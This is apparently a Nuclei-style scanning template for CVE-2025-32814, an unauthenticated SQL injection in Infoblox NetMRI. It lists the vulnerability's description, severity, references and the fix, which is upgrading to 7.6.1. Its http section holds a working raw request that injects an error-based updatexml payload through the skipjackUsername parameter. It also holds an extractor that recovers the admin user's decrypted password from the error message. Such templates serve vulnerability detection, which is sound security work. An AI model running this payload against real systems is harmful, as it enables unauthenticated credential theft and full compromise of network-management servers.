id: CVE-2025-32814

info:
  name: NetMRI Unauthenticated SQL Injection via skipjackUsername
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
  impact: |
    Unauthenticated attackers can extract sensitive data including encrypted passwords through SQL injection in the skipjackUsername parameter, potentially leading to complete system compromise.
  remediation: |
    Upgrade to Infoblox NetMRI version 7.6.1 or later that properly sanitizes SQL input parameters.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32814
    - https://rhinosecuritylabs.com/research/infoblox-multiple-cves/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32814
    cwe-id: CWE-89
    epss-score: 0.32102
    epss-percentile: 0.96917
    cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: infoblox
    product: netmri
    fofa-query: icon_hash="-319724102"
  tags: cve,cve2025,sqli,unauth,netmri,rails,error-based,vkev,vuln

http:
  - raw:
      - |
        GET /netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=%22admin%22),%22password%22,1),CHAR(126)),null)--%22&skipjackPassword=anything&weakPassword=true&eulaAccepted=Accept&mode=DO-LOGIN HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: password
        group: 1
        regex:
          - "XPATH syntax error: '~(.*?)~'"
        internal: true

      - type: dsl
        dsl:
          - "'Password: ' + password"

    matchers:
      - type: word
        part: body
        words:
          - 'XPATH syntax error:'
# digest: 4a0a00473045022100e3a484d85affd64720afc33dd95622d7dd97043526ad216de2280a77de6a4ce902206d709e5c0c2b2faa90ed4bde64d44626a0ce4f77b4e1f3213f9fbb64a73b9b22:922c64590222798bb761d5b6d8e72950